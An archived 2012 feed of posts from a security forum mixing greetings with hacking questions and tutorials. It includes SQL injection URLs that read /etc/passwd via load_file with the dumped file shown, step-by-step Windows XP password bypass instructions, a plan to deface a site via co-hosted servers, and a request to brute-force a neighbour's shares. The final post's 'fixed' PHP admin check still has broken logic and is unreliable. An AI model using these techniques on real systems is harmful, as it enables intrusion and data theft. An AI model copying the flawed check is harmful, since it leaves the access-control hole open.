ASTALAVISTA Forum Feed

Hi To All

Wed, 16 May 2012 20:47:56 +0000

Hi to all.....hoping a nice place to hang

Need Mw3 Pc Hacks

Wed, 16 May 2012 17:33:56 +0000

hi guys does any1 have any hacks for mw3 pc?

[Ask] Deface Technique ?

Wed, 16 May 2012 14:25:36 +0000

Excuse me.. i want to ask something about hot to deface a website , but the website just have index.html , nothing process in these website... so.. we can't use SQLi , LFI , RFI , and much more..

assumption , i want to deface www.target.com but the website only have index.html file so we can't use SQLi , LFI , RFI , and much more..

i think only one way to deface www.target.com , i think rooting is the technique..

but to rooting we must have a php shell in the web that one server with www.target.com

so.. first we musct search websites which one server with www.target.com

we can use domain reverse to search websites which one server with www.target.com

bingo , no we have list websites which one server with www.target.com

assumption the list of websites which one server with www.target.com is :

www.a.com
www.b.com
www.c.com
www.d.com

and much more.. may be the list result up to thousand or hundred...

now we want to deface www.target.com , because www.target.com only have index.html , so we must rooting..

so... we must have php shell in the web which one server with www.target.com

but , how can i search bug in the web which one server with www.target.com ? and then we can upload the shell and rooting...

am i search bug in the websites which one server with www.target.com manualy / one by one ?

any other thing / ore technique to search bug without manualy.. ?

please... help me..

sorry for my bad english

Brute Force Network Share?

Wed, 16 May 2012 08:26:21 +0000

Hello,

I recently noticed some extra computers on my home network which don't belong to me!
Guessing that one of the neighbours is using the same powerline adapters as me and hasn't secured theirs either.
I've been using mine for a few years now and probably forgot to secure them when I got them.

Now I would normally just secure them and that would be the end of it were it not that I was looking into their
computers and found a media device which contains a lot (almost the entire library) of the same music I have.

So either this guy has a incredible good taste of music or he "borrowed" my music. Probably getting that from
my data share which had no security before (easier to share with my other pc's and I didn't expect someone to
be able to access them without physical access).

Thus I'm kinda looking to either a) repay the favour and/or find out who he is/where he lives and contact him.
Is there an "easy" way to enumerate windows users/share and brute force them?
I've been looking around a bit but it al seems so complicated

He's also using my router, my internet connection and I can ping his pc, laptop and his mum's pc
I live in this huge appt building so there's no telling who this guy might be...

Thanks!

Hello

Tue, 15 May 2012 20:27:08 +0000

Hi,

Just saying hello, I have had this account for 2 years now out of interest but never got round to reading up/posting.

I'm just your basic small company IT guy who spends most of his time telling users to CTRL-S regularly whilst picking
stuck paper out of a printer. I never got an IT degree but just somehow rolled into it and made my hobby my job.

I'm interested mainly in System/server/network management, programming looks Chinese to me and never could
interest me that much. Upto now I never got round to getting somer certs, mostly because I'm somewhat lazy but
getting MCITP is on my to-do list for the next year and a halforsomethinglike that.

That's it!

Confused Regarding Hex Strings

Tue, 15 May 2012 17:40:39 +0000

Heyo Asta members.

I've stumpled across some hex strings, that I'm a bit confused about.

A string like "\x16\x03\x01" is rather straight forward, I'm fairly sure I understand those. The \x indicates it's a hex value, and the last two characters represents a value in hexadecimal (00-FF).

My confusion begins when there's suddenly more than two characters after the \x. This string, for an example, "\x04N\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x04D\x08\xff\x03\x01\x00\x124444..." (from the CVE-2012-1675), starts with \x04N. What does the 'N' signify?

And the last \x124444. Is that as simple as reading it as a value greater than 255?

And then I've seen this in my apache log files: "GET /_%5Cx04%5Cx8e,%5Cx16%5Cx99%5Cx80%5Cxc8%5Cxe6%7Ds%5Cxcc7%5Cxeb%3E7 HTTP/1.1"
URLDecoded through Astalavista URLDecoder I get this: "GET /_\x04\x8e,\x16\x99\x80\xc8\xe6}s\xcc7\xeb>7 HTTP/1.1" Now what should I make of "\xe6}s"?

I hope some of you can explain some of these things to me

Could Anyone Help?

Tue, 15 May 2012 17:36:27 +0000

Hi there.
How you see i'm new here, and I need you help.
Could anyone help me to protect my website ( php fusion ) system?
From injections, shells etc? I will be really happy, and give big thanks for you

mine skype is mikisz19 why skype? I probobly forget this website but you can send me a PM!
Thanks

p.s sorry for writing not in good section, I just didn't find best:D

Greetings Astalavista Citizens

Tue, 15 May 2012 17:11:51 +0000

I used to be registered to this site before. In the Sharereactor days. Back then I was interested in learning to decrypt scripts and programs, analyze the serial algorythm, and create the keygen. Alas I gave up. Because it was way above my head.
Now I'm back for a second attempt.

Keep me covered. I'm going in.

Hello Everyone

Tue, 15 May 2012 09:50:29 +0000

hello everyone my name is David i am from England

i am interested in securing computer systems and beating aka testing security systems

i am a university student now im on break so looking for some to hang and learn and enjoy while i am break

i look forward to learning sharing and meeting many new friends and also professional

kind regards david

Eavesdrop With Just A Cell Phone ?

Mon, 14 May 2012 21:58:06 +0000

Can someone please advice if this site is a scam or not ? : http://www.cellphonespymaster.com/
They claim that with just a software installed on your cell phone you can eavesdrop conversations from other cell phones?

I know this can be done with an antenna and a laptop but not directly from your cell phone. : http://www.wired.com/threatlevel/2010/07/intercepting-cell-phone-calls/

Cheers.

Sql Injection 2 Get Server Files

Mon, 14 May 2012 20:14:30 +0000

Lets Say we've found a Sql Injection and Magic_qouts = off, its awsome so first we wanna know if we got a panel... so we've used lots of t00ls, not even robots.txt so... What can we do maybe we can call passwd...

here we have the God Damn Vulnerable Code haha now... where is the error...

in the GET we haven't filter anything... Sql Injection...

here is the web:

http://www.webvulnerable.pe/profile.php?id=%27

now and Injection, simple injection...

http://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,3,4,5--

so...now... lets inject... with the function load_file

http://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,null,load_file('etc/passwd'),5--

Magic...

Quote

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin ricci:x:101:102:ricci daemon user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hpsmh:x:103:500::/opt/hp/hpsmh:/sbin/nologin Administrador:x:500:501::/home/Administrador:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

hahhaha yeah... now.. we've got the passwd, but this is an example because if not... then you got to make some path trasversal to get the passwd file...

How can we protect us?

source

Thanks & Regards
Dedalo

About Hacking >.<

Mon, 14 May 2012 18:32:48 +0000

No, i will not teach you you how to hack in this post, so if you clicked on this to because you thought that i will, you can stop reading

Here

And now for the rest of you.

Hacking is not what people think it is:
Its not done in 20 secons (well, most arent)
No one will take you by hand and show you the way... (well, unless they have no self respect)
Hacking is not as easy as getting a tool and making it do all the work for you. (alltho you can probebly crack a weak WIFI with that)

Now that we past that, let me start this of

First of all, hacking can be classed anything as little as oppening a CMD and typing telnet into it.
Many people use so called Hacking to test their systems/connections/servers

You see, people get the wrong idea about the whole thing, there is no such thing as hacking...
First of all its called testing or security, Yes there are People who use their knowladge in the wrong.

I noticed that many people come to this forum asking members to teach them how to hack, and all it does, is shows everyone that those people are compleat Ideots who just watched too many films, and think its all so easy and you can get away with things.

HACKING is ILLIGAL People go to prison for it, you cannot get away with it, as anyone who knows how to trace MAC adresses can find you any time you access the internet.

So please stop asking about how to hack or how to break into a website if you dont even understand what it is.

Being Hacked?

Mon, 14 May 2012 10:54:49 +0000

Hi guy's how are you? ok i've got a problem witht the government who keep hacking me trying to find out about me and steal any work i got on my computer anyhowi have mcafee antivirus and firewall n shit all a dat but i know in a different way that the government can hack any body now is there anyone who can help me with some better security is there any software or anyhting i can use to check up on it? i'm a newbie n shit at all of this but i remember astalavista from ages back in the day and it was way wikid anD any wa i reckon there's some young talent out their who kno verything about alla this who can help me man i swear there even watching me through my built in camera so i have to cover it up fuck! ite peep's thanks for ur help..

HiLLy

Need Help On E-Mail Addresses Harvested From Search Engines

Mon, 14 May 2012 10:35:16 +0000

One of our clients have external pen test done by a third party (the scan results are below), and E-mail addresses for our client’s domain has been harvested from search engines.

our client is intended to follow the recommendations (listed below), however they are asking for our comment with regard to potential actions that can be taken to mitigate any risk to the organisation. Please anyone can help to answer on this please?

Just for side note the client already have a very good spam firewall in place to filter the junk emails.

Description:
A number of personal email addresses, belonging to the abc.com domain, were harvested from public search engines.
Although this is considered as low risk for the organization it should be noted that having personal email addresses disclosed in the public internet could expose the organization to client side attacks.
Hackers could intentionally target email addresses collected and send messages containing payloads that, if executed, could permit unauthorized access to the internal resources.

Section 3.1.1 includes a list of the email addresses that were harvested.
Recommendation:
The organisation should ensure to further limit the exposure of personal email addresses on the internet.
Additionally policies should be enforced among the employees educating them against the possibilities of their email address being targeted by external attacker.

Wireless Passwoed Finder With Ipod Touch 4

Sat, 12 May 2012 17:50:03 +0000

Hey guys, there is a rumOr that there is an application on ipods or iphones when they are jailbroken that can find the password of a wireless.. Any help about that? DOes it excists? If yes how can i find it? Thnx for ur time

Change Machine Id Windows 7 64Bit

Fri, 11 May 2012 10:40:55 +0000

Hello guys
I need some help...
There is some ones know how to change the machine ID on Windows 7 64Bit or suggest a software can change it.

Take care

Bypass Xp Passwords!

Thu, 10 May 2012 13:39:57 +0000

If you have physical access to a computer, bypassing the password is very simple, not as hard as you might think. Sure, there's a lot of talk about cracking passwords and getting them, but with a Windows XP computer, you can just simply bypass them. It's easy like that

All you have to do is follow these simple instructions.

1) Sit down at your computer
Optional) Use System Restore to make a restore point, just in case you stuff up.
2) Turn off your antivirus!*
3) Download DreampackPL
4) Unzip the file and get DPL.ISO
5) Burn the ISO to any CD using any burning software.
6) Tell your BIOS to boot from CD.
7) Put the CD in and let it load.
8) A Windows 2000 Setup screen will appear.
9) Press "R" to install DreampackPL.
10) Press "C" to install it again using recovery console.
11) Select the Windows installation you have (Usually '1' if you only have the 1 OS)
It is important to type these next two commands perfectly!
12)[This backs up the original password files] "ren C:\WINDOWS\System32\sfcfiles.dll sfcfiles.lld" (without quotes)
13) [This puts in the dreampack files] "copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes)
[Number 13 assumes your CD Drive is D:]
14)Type in exit, take out CD and reboot!

15) If you have the Welcome Screen on, press Ctrl + Alt + Del until the default WinNT login screen appears.
16) Type in 'dreamon' (without quotes) into the password field.
17) Press the top graphic and this image should appear, or something like it:

18) Enter the commands section, and enable 'god'.

19) Type 'god' into the password field and your in!
20) Alternatively, you can go to Passwords and enable "Logon with wrong password and hash'
and you can log on using any account!

References:

Spoiler

Being Back

Thu, 10 May 2012 08:14:13 +0000

ok well let me say this i hope that asta is over what i call the dark times and the site continues to move forward !!

now i would like to say thanks to all the people whom have welcomed me back to the site i actually never left my voice was just silenced for a while on the site by the powers that were in charge , i did visit the site from time to time in the hopes that things would change and they have !!

so i was very surprised with the amount of people who checked my page and the frequency that they did since my first post this week i have received several emails welcoming me back this was surprising and very humbling i did not know that i had so many followers so again thanks for that!! now as some of you know i will always try and help you with you're questions and if i don't know the answer i will try and at least get you to the right place !!

and to answer some questions yes i still teach the on line class for M.I.T
and no i will not teach you how to hack fb gmail yahoo mail and iam sorry that you're wife husband girlfriend boyfriend is cheating on you !! so any questions just ask !!
and to answer one more question why i don't have a paid membership i have 7 kids 4 are in college and i work 3 jobs and i am a single parent so i hope that clears things up !!

peace raven

Website Pentration

Wed, 09 May 2012 16:15:31 +0000

hey everyone i am trying to figure out what i will need to "hack" into a website. Such as tools & software thats easy to use. I know a bit about http fingerprintiing but not enough to gather all the information for gaining access to a website. I have googled this topic & i am not getting much of any help or tools to use. All help is greatly appericated. Thanks everyone.

Remember To Kill Your Php Scripts!

Wed, 09 May 2012 10:51:19 +0000

... or "How I got Hacked By A Webcrawler"

Yesterday, I found out that it's -very- important to kill your PHP scripts at the right time.

A while ago, I made a CMS webpage in PHP for a local BMX club. The CMS of course has a control panel, where the administrator can add pages, menus, files, and whatnot. Adding, editting, and deleting each items are accessible through links from a list view. The control panel is a single PHP file, called with different GET arguments in order to perform different actions. Of course, the first thing the script does, is to verify that the user is logged in as the administrator. If not, then the user is redirected to the index.php page. I did that like so:

  if (!isset($_SESSION['id']) && !is_numeric($_SESSION['id']) && !$_SESSION['id']==1)
	header("location: index.php");

$_SESSION['id'] is given the users ID from the database upon login, so basically the test verifies that the session variable is set, is numeric, and is equal to one which is the administrators user ID. (I know it's not a good idea to hardcode user IDs like that, but meh - it was a rather quickly build CMS)

In all the browsers I've ever tested, this worked perfectly. The browser gets redirected to the frontpage, in case the user isn't logged in as the administrator. And I thought all was fine.

But.

I had assumed that the header() function would just end the PHP script, which it does not! It goes on to compile the entire control panel, and sends that to the browser as well. Usually a browser never displays this, because it gets the redirect header, so it doesn't bother to render the HTML that comes afterwards.

Two nights ago the administrator calls me and tells me that that database has been reset somehow. I log into the webhost and see that everything in the database is as it should be, except for the tables containing the pages and menus - they've had all their rows deleted. My initial thought was that some kid from the club had gained access to the control panel, and simple deleted the pages and menus from there, so I went through the apache logfiles to find an IP address that the club administrator maybe could use. I found the IP address and all the entries for whomever had accessed the control panel and pressed all the delete links. But I found it strange that the "hacker" had also pressed all the links to move the menus up and down in the sorting order, before deleting it. Then I noticed that in the user agent, where a URL to a Danish webpage. I of course went to the page, and was greeted with a message that explained that this organisations webcrawler were leaving this URL behind to identify itself.

So, it turns out that the administrator has for some reason linked to the control panel in on of the public pages. This webcrawler comes along and of course follows it. Now, being a webcrawler and not a browser, it couldn't care less about the redirect header that the control panel threw at it, and just kept on reading the rest of the HTML that of course were sent along. Reading the control panels links, it of course just kept following those, and at some point following the "delete" links. So my CMS got hacked by a simple webcrawler. Yes. I do feel stupid.

I replicated the webcrawler's "hack" by using curl on my linux box. Using curl, I saw that the header were fine, asking the browser to redirect to index.php, but after the header the control panel where sent in all it's HTML glory. I suppose that if it's possible to turn off automatic redirection in a browser, then the browser would just as gladly show the user the control panel.

The fix was simple. I just had to remember to kill the PHP script after validation failed. Then the rest of the script wouldn't be executed, and the control panel wouldn't be sent along with the redirect header.

  if (!isset($_SESSION['id']) && !is_numeric($_SESSION['id']) && !$_SESSION['id']==1)
  {
	header("location: index.php");
	die();
  }